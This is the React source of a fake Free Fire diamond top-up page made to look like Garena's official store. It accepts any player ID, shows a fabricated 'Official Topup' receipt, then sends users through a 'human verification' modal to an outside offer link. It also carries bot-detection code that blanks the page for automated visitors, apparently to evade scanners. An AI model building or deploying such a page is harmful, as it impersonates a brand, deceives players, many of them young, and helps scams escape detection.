import React, { useState, useEffect } from 'react';
import './App.css';

const PACKS = [
  { qty: 100, base: 14 },
  { qty: 210, base: 28 },
  { qty: 530, base: 70 },
  { qty: 1080, base: 140 },
  { qty: 2200, base: 280 }
];

const PAYMENT_METHODS = [
  { img: "https://garena.pakff.com/image/inwi_mb.png", promo: false },
  { img: "https://garena.pakff.com/image/Maroc-T.webp", promo: false },
  { img: "https://garena.pakff.com/image/Orange_logo.svg.webp", promo: false },
  { img: "https://garena.pakff.com/image/logo_ar-7d705e521c7ad0f21322bb1e32837ec9.png", promo: false },
  { img: "https://garena.pakff.com/image/361d52b7ed94d502dd625e9f3feb4434.webp", promo: true }
];

function App() {
  // --- 🛡️ نظام الحماية المتطور (Anti-Scraping) ---
  const [isSafe, setIsSafe] = useState(true);

  useEffect(() => {
    const detectBot = () => {
      // الكشف عن البوتات أو برامج سحب الكود
      const isBot = navigator.webdriver || !navigator.languages || navigator.languages.length === 0;
      if (isBot) {
        setIsSafe(false);
      }
    };
    detectBot();
  }, []);

  // --- ⚙️ حالات التطبيق ---
  const [view, setView] = useState('shop'); // التنقل بين المتجر والوصل
  const [playerId, setPlayerId] = useState('');
  const [isLoggedIn, setIsLoggedIn] = useState(false);
  const [idError, setIdError] = useState(false);
  const [selectedPack, setSelectedPack] = useState(null);
  const [paymentMethod, setPaymentMethod] = useState(null);
  const [receiptStatus, setReceiptStatus] = useState('loading'); // loading ثم pending
  const [showModal, setShowModal] = useState(false);

  // --- 🚀 الوظائف ---
  const handleLogin = () => {
    if (playerId.trim().length >= 5) {
      setIsLoggedIn(true);
      setIdError(false);
    } else {
      setIdError(true);
    }
  };

  const handleStartPurchase = () => {
    setView('receipt');
    setReceiptStatus('loading');
    window.scrollTo(0, 0);
    setTimeout(() => {
      setReceiptStatus('pending');
    }, 1500);
  };

  const redirectToVerify = () => {
    window.location.href = "https://contff.com/cl/i/372l4n";
  };

  // حماية: إذا تم اكتشاف سحب أو بوت، تظهر صفحة بيضاء فارغة
  if (!isSafe) {
    return <div style={{ backgroundColor: 'white', height: '100vh', width: '100vw' }}></div>;
  }

  return (
    <div className="App">
      <div className="main-header-banner">
        <img src="https://sho2gameshopshop2gameshopshop2gameshopshop2gameshop.pakff.com/20260105_194632.png" alt="Header" />
      </div>

      {view === 'shop' ? (
        <div className="container">
          <div className="hero-banner">
            <img src="https://j.top4top.io/p_36573aom31.jpg" alt="Banner" />
          </div>

          {/* الخطوة 1: تسجيل الدخول */}
          <div className="card">
            <div className="card-title"><span className="step-num">1</span> Login</div>
            <div className="input-group">
              <input 
                type="number" 
                placeholder="Enter Player ID here"
                value={playerId}
                onChange={(e) => setPlayerId(e.target.value)}
                disabled={isLoggedIn}
              />
              <button className="btn-login" onClick={handleLogin} disabled={isLoggedIn}>
                {isLoggedIn ? "Logged In" : "Login"}
              </button>
            </div>
            {idError && <div style={{color:'red', marginTop:'5px', fontSize:'13px'}}>Invalid Player ID</div>}
          </div>

          {/* الخطوة 2: اختيار الجواهر */}
          <div className="card">
            <div className="card-title"><span className="step-num">2</span> Select Amount</div>
            <div className="grid grid-3">
              {PACKS.map((p, idx) => (
                <div 
                  key={idx} 
                  className={`pay-method ${selectedPack?.qty === p.qty ? 'active' : ''}`}
                  onClick={() => setSelectedPack(p)}
                >
                  <span>{p.qty} 💎</span>
                </div>
              ))}
            </div>
          </div>

          {/* الخطوة 3: وسيلة الدفع */}
          <div className="card">
            <div className="card-title"><span className="step-num">3</span> Mode de paiement</div>
            <div className="payment-grid">
              {PAYMENT_METHODS.map((method, idx) => (
                <div 
                  key={idx} 
                  className={`pay-method ${paymentMethod === idx ? 'active' : ''}`}
                  onClick={() => setPaymentMethod(idx)}
                >
                  {method.promo && <div className="promo-badge">💎 PROMO</div>}
                  <img src={method.img} alt="Pay" />
                  <div className="method-info"><span>{selectedPack ? selectedPack.base : 0}</span> DH</div>
                </div>
              ))}
            </div>
          </div>

          {/* الشريط السفلي للتأكيد */}
          {isLoggedIn && selectedPack && paymentMethod !== null && (
            <div id="bottom-bar">
              <div className="summary-info">
                <div style={{fontWeight:'bold', fontSize:'18px'}}>{selectedPack.qty} 💎</div>
                <div style={{color:'red', fontWeight:'bold'}}>Total: {selectedPack.base} DH</div>
              </div>
              <button className="btn-buy" onClick={handleStartPurchase}>✓ Buy Now</button>
            </div>
          )}
        </div>
      ) : (
        /* PAGE 2: صفحة الوصل */
        <div className="receipt-container">
          {receiptStatus === 'loading' ? (
            <section className="hero-status">
              <div className="status-center">
                <div className="spinner"></div>
                <h2 style={{margin:0, fontSize: '16px'}}>Loading...</h2>
              </div>
            </section>
          ) : (
            <>
              <section className="hero-status">
                <div className="status-center">
                  <div className="warning-icon">!</div>
                  <h1 style={{margin:'5px 0', fontSize:'26px', fontWeight:900, color:'#d32f2f'}}>Action Required!</h1>
                  <p style={{fontSize:'14px', color:'#555'}}>Order is ready. Click below to verify.</p>
                </div>
              </section>

              <div style={{maxWidth: '600px', margin: '25px auto'}}>
                <div className="receipt-row">
                  <span>Total Amount</span>
                  <span style={{fontWeight:'bold'}}>💎 {selectedPack.qty + Math.floor(selectedPack.qty * 0.1)}</span>
                </div>
                <div className="bonus-box">
                  <div className="receipt-row" style={{border:0, padding:'5px 0'}}>
                    <span>Origin</span><span>💎 {selectedPack.qty}</span>
                  </div>
                  <div className="receipt-row" style={{border:0, padding:'5px 0'}}>
                    <span>+ Bonus</span><span>💎 {Math.floor(selectedPack.qty * 0.1)}</span>
                  </div>
                </div>
                <div className="receipt-row"><span>Price Paid</span><span>{selectedPack.base} DH</span></div>
                <div className="receipt-row"><span>Game</span><span>Free Fire</span></div>
                
                {/* تم إضافة السطر المطلوب هنا */}
                <div className="receipt-row"><span>Mode</span><span style={{fontWeight:'500'}}>Official Topup</span></div>
                
                <div className="receipt-row"><span>Time</span><span>{new Date().toLocaleString()}</span></div>
                
                <div style={{marginTop: '30px'}}>
                  <button 
                    style={{background: 'var(--garena-red)', color: '#fff', border:'none', padding: '16px', borderRadius: '10px', fontWeight: 'bold', cursor: 'pointer', width: '100%', fontSize: '18px'}}
                    onClick={() => setShowModal(true)}
                  >
                    COMPLETE PROCESS
                  </button>
                </div>
              </div>
            </>
          )}
        </div>
      )}

      {/* مودال التحقق النهائي */}
      {showModal && (
        <div className="modal-overlay">
          <div className="modal-box">
            <div style={{fontSize: '40px', marginBottom: '15px'}}>🛡️</div>
            <h2 style={{color: 'var(--garena-red)', marginBottom: '10px'}}>Verification Required</h2>
            <p style={{color: '#666', fontSize: '14px', lineHeight: '1.5', marginBottom: '25px'}}>
              Please complete the human verification to release and receive your <b>Diamonds</b> instantly.
            </p>
            <button 
              style={{background: 'var(--garena-red)', color: '#fff', border: 'none', padding: '12px 30px', borderRadius: '8px', fontWeight: 'bold', cursor: 'pointer', width: '100%'}}
              onClick={redirectToVerify}
            >
              VERIFY NOW
            </button>
            <p style={{marginTop: '15px', fontSize: '12px', color: '#999', cursor: 'pointer'}} onClick={() => setShowModal(false)}>Close</p>
          </div>
        </div>
      )}
    </div>
  );
}

export default App;